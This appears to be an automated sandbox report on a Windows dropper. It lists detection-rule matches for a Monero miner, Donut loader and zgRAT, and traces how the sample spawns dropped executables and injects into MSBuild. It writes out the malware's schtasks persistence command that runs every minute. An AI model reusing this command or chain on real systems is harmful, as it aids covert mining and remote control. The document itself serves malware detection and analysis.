                            Source: 24.3.sys_updater.exe.21e0345551d.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 24.3.sys_updater.exe.21e034544fd.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.3.IIZS2TRqf69aZbLAX3cf3edn.exe.234d5ad04cd.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 24.3.sys_updater.exe.21e034544fd.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.3.IIZS2TRqf69aZbLAX3cf3edn.exe.234d5ad10e5.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 31.3.sys_updater.exe.20e49503455.3.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 27.3.sys_updater.exe.159f35a4885.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 31.3.sys_updater.exe.20e4950304d.2.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 31.3.sys_updater.exe.20e494ac50d.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 31.3.sys_updater.exe.20e494ac915.1.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000001B.00000003.2794263235.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000009.00000003.2181775167.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000018.00000003.2693194416.0000021E0319A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000018.00000003.2692757034.0000021E034D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY | Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000018.00000003.2692958541.0000021E0318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: HM3SOlbpH71yEXUIEAOeIiGX.exe.4.dr, -Module-.cs | Large array initialization: _202D_200B_200C_200E_206C_206A_206C_206A_206C_202B_202B_202D_202E_206B_206A_206C_200E_202B_206C_206B_206A_206B_206A_200E_202C_200F_200E_206B_206E_206B_200E_206F_200E_206E_206C_200B_200E_202B_202D_200D_202E: array initializer size 70240
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Process Stats: CPU usage > 49%
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C7787A0 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetModuleHandleW,GetProcAddress, 10_2_6C7787A0
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005E98AE 0_2_005E98AE
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005D65F0 0_2_005D65F0
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005D5880 0_2_005D5880
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F19A0 0_2_005F19A0
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_006002CE 0_2_006002CE
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F72BB 0_2_005F72BB
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005F8B60 0_2_005F8B60
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005DA330 0_2_005DA330
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_0060B4B1 0_2_0060B4B1
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005DD550 0_2_005DD550
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_00602D19 0_2_00602D19
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_0060B5D1 0_2_0060B5D1
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005D4780 0_2_005D4780
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: 0_2_005E5780 0_2_005E5780
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_005498AE 3_2_005498AE
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_005365F0 3_2_005365F0
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00535880 3_2_00535880
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_005519A0 3_2_005519A0
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_005602CE 3_2_005602CE
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_005572BB 3_2_005572BB
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00558B60 3_2_00558B60
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_0053A330 3_2_0053A330
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_0056B4B1 3_2_0056B4B1
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_0053D550 3_2_0053D550
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00562D19 3_2_00562D19
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_0056B5D1 3_2_0056B5D1
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00534780 3_2_00534780
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: 3_2_00545780 3_2_00545780
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C779140 10_2_6C779140
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C771340 10_2_6C771340
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C7787A0 10_2_6C7787A0
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C771030 10_2_6C771030
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C7930D5 10_2_6C7930D5
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C778E10 10_2_6C778E10
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_6C787380 10_2_6C787380
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_017B0F98 10_2_017B0F98
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_017B2CE0 10_2_017B2CE0
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_017B2CD1 10_2_017B2CD1
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_017B37D0 10_2_017B37D0
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_017B37C1 10_2_017B37C1
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: 10_2_017B0EF8 10_2_017B0EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_014C7720 12_2_014C7720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_014C7468 12_2_014C7468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_014C7713 12_2_014C7713
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_06F50578 12_2_06F50578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_06F5F458 12_2_06F5F458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_06F50568 12_2_06F50568
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Code function: String function: 00551660 appears 54 times
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Code function: String function: 005F1660 appears 54 times
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Code function: String function: 6C788630 appears 33 times
Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: RPHbzz3JqY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 24.3.sys_updater.exe.21e0345551d.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 24.3.sys_updater.exe.21e034544fd.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 9.3.IIZS2TRqf69aZbLAX3cf3edn.exe.234d5ad04cd.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 24.3.sys_updater.exe.21e034544fd.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 9.3.IIZS2TRqf69aZbLAX3cf3edn.exe.234d5ad10e5.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 31.3.sys_updater.exe.20e49503455.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 27.3.sys_updater.exe.159f35a4885.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 31.3.sys_updater.exe.20e4950304d.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 31.3.sys_updater.exe.20e494ac50d.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 31.3.sys_updater.exe.20e494ac915.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 0000001B.00000003.2794263235.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 00000009.00000003.2181775167.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 00000018.00000003.2693194416.0000021E0319A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 00000018.00000003.2692757034.0000021E034D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 00000018.00000003.2692958541.0000021E0318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY  Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.f363d4.1.raw.unpack, CursorBuffer.cs  Cryptographic APIs: 'TransformBlock'
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsToolkit.cs  Cryptographic APIs: 'CreateDecryptor'
                            Source: classification engine  Classification label: mal100.troj.evad.mine.winEXE@69/36@0/6
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe  Code function: 0_2_005DA330 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,CoUninitialize,SysAllocString,SysAllocString,SysFreeString,SysFreeString,CoUninitialize,VariantClear,VariantInit,VariantClear,CoUninitialize, 0_2_005DA330
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe  File created: C:\Users\user\AppData\Roaming\rZ9zgPTn
                            Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe  Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe  Mutant created: \Sessions\1\BaseNamedObjects\f3b3de9e353268524740ab3df9b4ee37
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Mutant created: \Sessions\1\BaseNamedObjects\Global\23495762359867
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe  Mutant created: \Sessions\1\BaseNamedObjects\Global\349587345342
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe  Mutant created: \Sessions\1\BaseNamedObjects\93ec2b129ecfa430ebf98f
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe  File created: C:\Users\user\AppData\Local\Temp\23495762359867
                            Source: RPHbzz3JqY.exe  Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (this identical query is logged 149 times in the report)
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor (logged twice)
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe  File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: RPHbzz3JqY.exe  ReversingLabs: Detection: 60%
                            Source: RPHbzz3JqY.exe  Virustotal: Detection: 56%
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe  File read: C:\Users\user\Desktop\RPHbzz3JqY.exe
                            Source: unknown  Process created: C:\Users\user\Desktop\RPHbzz3JqY.exe "C:\Users\user\Desktop\RPHbzz3JqY.exe"
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe  Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe  Process created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                            Source: unknown  Process created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown  Process created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Source: unknown  Process created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe "C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe "C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe "C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe "C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe "C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe"
